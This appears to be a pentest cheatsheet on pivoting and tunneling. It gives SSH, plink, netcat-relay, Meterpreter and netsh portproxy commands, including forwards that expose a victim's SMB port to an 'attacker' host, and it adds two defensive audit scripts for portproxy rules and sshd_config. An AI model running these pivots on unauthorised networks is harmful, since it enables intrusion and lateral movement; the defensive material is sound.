Pivoting/Tunneling
Note: the target must have SSH running for this to work.
- Create the SSH tunnel:
ssh -D localhost:<local port> -f -N user@localhost -p <Target Port>
- Set up ProxyChains: edit /etc/proxychains.conf and add the following line (the proxy type keyword is lowercase in this file):
socks5 127.0.0.1 <Local Port>
- Run commands through the tunnel:
proxychains <command>
sshuttle (in Kali). Source: https://github.com/sshuttle/sshuttle
- sshuttle -r root@172.21.0.0 10.2.2.0/24
Meterpreter portfwd. Use only if you have a meterpreter shell and you need to pivot to another network.
- meterpreter > portfwd add -l 80 -r 172.21.0.0 -p 80
In Metasploit
- use post/multi/manage/autoroute
msf5 post(multi/manage/autoroute) > options
Module options (post/multi/manage/autoroute):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD autoadd yes Specify the autoroute command (Accepted: add, autoadd, print, delete, default)
NETMASK 255.255.255.0 no Netmask (IPv4 as "255.255.255.0" or CIDR as "/24")
SESSION yes The session to run this module on.
SUBNET no Subnet (IPv4, for example, 10.10.10.0)
msf5 post(multi/manage/autoroute) >
- set session
- run
SOCKS server modules to run on top of the route (msf search results):
1 auxiliary/server/socks4a normal No Socks4a Proxy Server
2 auxiliary/server/socks5 normal No Socks5 Proxy Server
3 auxiliary/server/socks_unc normal No SOCKS Proxy UNC Path Redirection
- ncat -vv --listen 3128 --proxy-type http
netcat relay through a named pipe:
- mknod pivot p
- nc -l -p <port to listen on> 0<pivot | nc <target host> <target port> 1>pivot
# plink in an interactive shell
plink.exe -ssh -L 0.0.0.0:4444:10.1.1.1:445 admin@10.10.1.1
plink.exe -ssh -R 10.10.1.1:4444:127.0.0.1:445 attacker@10.10.1.1
plink.exe -ssh -D 127.0.0.1:8080 admin@10.10.1.1
# plink in non interactive shell
cmd.exe /c echo y | plink.exe -ssh -l admin -pw password -R 10.10.1.1:4444:127.0.0.1:445 attacker@10.10.1.1
netsh local port forwarding:
netsh interface portproxy add v4tov4 listenaddress=10.1.1.1 listenport=4444 connectaddress=10.1.1.1 connectport=3306
netsh advfirewall firewall add rule name="4444_to_3306" protocol=TCP dir=in localip=127.0.0.1 localport=3306 action=allow
From https://werebug.com/pentest-cheatsheet/#port-forwarding
apt install cntlm
cntlm -u username@breakme.local -I proxy
export http_proxy=http://127.0.0.1:3128
export https_proxy=http://127.0.0.1:3128
- Accessing with browser:
chromium --proxy-server="http://127.0.0.1:3128"
netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=9000 connectaddress=192.168.0.10 connectport=80
netsh interface portproxy delete v4tov4 listenaddress=127.0.0.1 listenport=9000
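Because portproxy rules survive reboots (they are kept under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp), a defender auditing a Windows host wants to list them and pick out the ones that look like the forwards above. The following is an added example, not code from the original page: it parses the text printed by `netsh interface portproxy show all` and flags rules that listen on a network-reachable address, relay to another host, or target a remote-admin/database port. The sample netsh output, the `WATCHED_PORTS` list and the `local_addrs` argument are all constructed assumptions.

```python
"""Audit Windows portproxy rules for pivot-style forwarding.

Added example, not code from the original wiki page. It parses the text
that `netsh interface portproxy show all` prints and flags rules a defender
would want to review. The sample output below is constructed.
"""
import ipaddress
import re

# Constructed sample of `netsh interface portproxy show all` output.
SAMPLE_NETSH_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
127.0.0.1       9000        192.168.0.10    80
10.1.1.1        4444        10.1.1.1        3306
0.0.0.0         3389        172.21.0.5      3389
"""

# Ports whose forwarding usually means remote-admin or database access is
# being relayed through the host (constructed watchlist, extend as needed).
WATCHED_PORTS = {22: "SSH", 445: "SMB", 3306: "MySQL", 3389: "RDP", 5985: "WinRM"}

# Data rows are "<addr> <port> <addr> <port>"; header and separator lines
# contain no numeric port column and therefore do not match.
ROW_RE = re.compile(r"^\s*(\S+)\s+(\d{1,5})\s+(\S+)\s+(\d{1,5})\s*$")


def parse_portproxy(text):
    """Return (listen_addr, listen_port, connect_addr, connect_port) tuples."""
    rules = []
    for line in text.splitlines():
        match = ROW_RE.match(line)
        if match:
            la, lp, ca, cp = match.groups()
            rules.append((la, int(lp), ca, int(cp)))
    return rules


def audit_rule(rule, local_addrs=()):
    """Return the list of findings for one rule (empty list: looks benign)."""
    listen_addr, _listen_port, connect_addr, connect_port = rule
    findings = []
    listen_ip = ipaddress.ip_address(listen_addr)
    connect_ip = ipaddress.ip_address(connect_addr)
    # A listener on 0.0.0.0 or an interface address is reachable from the
    # network, so anyone who can reach the host can use the forward.
    if not listen_ip.is_loopback:
        findings.append("listens on a network-reachable address %s" % listen_addr)
    # Forwarding to an address that is not this host relays traffic onward,
    # which is the pivot pattern (client -> this host -> another host).
    if not connect_ip.is_loopback and connect_addr not in local_addrs:
        findings.append("relays to another host %s" % connect_addr)
    if connect_port in WATCHED_PORTS:
        findings.append("target port %d is %s" % (connect_port, WATCHED_PORTS[connect_port]))
    return findings


def suspicious_rules(text, local_addrs=()):
    """Parse netsh output and return [(rule, findings)] for rules with findings."""
    results = []
    for rule in parse_portproxy(text):
        findings = audit_rule(rule, local_addrs)
        if findings:
            results.append((rule, findings))
    return results


if __name__ == "__main__":
    # local_addrs lists this host's own interface addresses (constructed);
    # a forward to one of them is local port redirection, not a pivot.
    for rule, findings in suspicious_rules(SAMPLE_NETSH_OUTPUT, local_addrs=("10.1.1.1",)):
        print("%s:%d -> %s:%d" % rule)
        for finding in findings:
            print("   -", finding)
```

On a live host, feed the script the output of `netsh interface portproxy show all` and pass the machine's own interface addresses as `local_addrs`; any rule that comes back with findings should be matched against change records, since the legitimate uses of portproxy on a workstation are rare.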
Windows 10 has SSH (thanks, WSL!); plink.exe is also available in Kali.
Dynamic port forwarding (SOCKS):
ssh -N -D 127.0.0.1:1337 user@remotehost -p 22222
- The -D means dynamic. The 1337 is the port you proxy traffic through. With this you can set up a SOCKS proxy on your local machine that sends traffic to port 1337, so that traffic goes through that port and then through the remote host. -N is optional; it means do not execute a remote command. Specifying 127.0.0.1 is also optional; it defaults to 127.0.0.1.
Via Putty:

Local port forwarding
ssh -N -L 0.0.0.0:4455:10.1.1.1:445 user@remotehost
or
ssh -L 8080:localhost:8080 user@remotehost
The -L stands for local. The first 8080 is the port on your machine, the second 8080 is the port on the remote machine (they don't have to be the same). After a successful SSH connection, if you request localhost:8080 (for example from your browser, to reach a web server listening only locally on the remote machine) that request is sent through the SSH tunnel to the remote host and you can connect to that remote service. In other words, whatever request you send to your localhost:8080 is forwarded to the remote host's localhost:8080.
Remote port forwarding
ssh -N -R 10.10.1.1:4455:127.0.0.1:445 attacker@10.10.1.1
Socks5 with SSH
ssh -N -D 127.0.0.1:8888 admin@10.1.1.1
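Every -D, -L and -R forward above is granted by the server side of the connection, so the corresponding mitigation lives in sshd_config: AllowTcpForwarding governs -L/-D/-R, PermitOpen restricts which destinations -L/-D may reach, GatewayPorts decides whether -R listeners may bind a non-loopback address, and PermitTunnel controls -w tun devices. The following is an added example, not code from the original page or from OpenSSH: it parses an sshd_config, reports the effective value of each of those directives (applying OpenSSH's documented defaults when a directive is absent, and letting the first occurrence win as sshd does) and emits the hardened fragment. The sample configuration is constructed.

```python
"""Audit sshd_config for the directives that let an SSH server act as a pivot.

Added example, not code from the original wiki page. It parses sshd_config
text, works out the effective value of each forwarding-related directive
(OpenSSH defaults apply when a directive is absent; the first occurrence of
a directive wins, as in sshd) and returns a hardened fragment.
"""

# Constructed sshd_config excerpt. GatewayPorts appears twice on purpose:
# sshd keeps the first value, so the later "no" does not take effect.
SAMPLE_SSHD_CONFIG = """
# Constructed sample configuration
Port 22
PermitRootLogin no
GatewayPorts yes
AllowTcpForwarding yes
X11Forwarding no
GatewayPorts no

Match User deploy
    AllowTcpForwarding no
"""

# OpenSSH defaults (keys lowercased; sshd_config keywords are case-insensitive).
DEFAULTS = {
    "allowtcpforwarding": "yes",          # governs -L, -D and -R
    "gatewayports": "no",                 # may -R listeners bind non-loopback?
    "permitopen": "any",                  # destinations -L / -D may reach
    "permittunnel": "no",                 # layer-2/3 tun forwarding (-w)
    "allowstreamlocalforwarding": "yes",  # Unix-domain socket forwarding
}

# Values that switch each forwarding path off entirely.
HARDENED = {
    "allowtcpforwarding": "no",
    "gatewayports": "no",
    "permitopen": "none",
    "permittunnel": "no",
    "allowstreamlocalforwarding": "no",
}

# Directive names as written in sshd_config, for the hardened fragment.
CANONICAL = {
    "allowtcpforwarding": "AllowTcpForwarding",
    "gatewayports": "GatewayPorts",
    "permitopen": "PermitOpen",
    "permittunnel": "PermitTunnel",
    "allowstreamlocalforwarding": "AllowStreamLocalForwarding",
}


def parse_sshd_config(text):
    """Return (global_settings, saw_match_block).

    Only directives before the first Match block are global; anything after
    it is conditional, so it is flagged for separate review rather than merged.
    """
    settings = {}
    in_match = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        key, value = parts[0], (parts[1] if len(parts) > 1 else "")
        if "=" in key:                      # "Keyword=value" form
            key, value = key.split("=", 1)
        key = key.lower()
        value = value.lstrip("= ").strip()  # "Keyword = value" form
        if key == "match":
            in_match = True
            continue
        if not in_match:
            settings.setdefault(key, value)  # first occurrence wins
    return settings, in_match


def is_weak(key, value):
    """True when the effective value still allows that forwarding path."""
    value = value.lower()
    if key == "permitopen":
        return value == "any"   # an explicit host:port list is already a restriction
    return value != HARDENED[key]


def audit_forwarding(text):
    """Return ([(directive, effective_value, weak)], saw_match_block)."""
    settings, saw_match = parse_sshd_config(text)
    report = []
    for key, default in DEFAULTS.items():
        effective = settings.get(key, default)
        report.append((key, effective, is_weak(key, effective)))
    return report, saw_match


def hardened_fragment():
    """sshd_config lines that disable every forwarding path globally."""
    return "\n".join("%s %s" % (CANONICAL[k], v) for k, v in HARDENED.items())


if __name__ == "__main__":
    report, saw_match = audit_forwarding(SAMPLE_SSHD_CONFIG)
    for key, value, weak in report:
        print("%-28s %-6s %s" % (CANONICAL[key], value, "WEAK" if weak else "ok"))
    if saw_match:
        print("Match block(s) present: review per-user/per-group overrides separately")
    print("\nHardened global settings:\n" + hardened_fragment())
```

Where forwarding is needed for one purpose, keep the global values hardened and grant the exception in a Match block (for example a single jump user with `AllowTcpForwarding yes` and a narrow `PermitOpen host:port` list), which is why the script reports Match blocks instead of folding them into the global result.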
- ssf: https://github.com/securesocketfunneling/ssf
- rpivot: https://github.com/klsecservices/rpivot
- hans (ICMP Tunneling): http://code.gerade.org/hans/
- Iodine (ICMP Tunneling over DNS): https://code.kryo.se/iodine/
- Dnscat2: https://github.com/iagox86/dnscat2
- Chisel: https://github.com/jpillora/chisel
- httptunnel: In Kali apt install httptunnel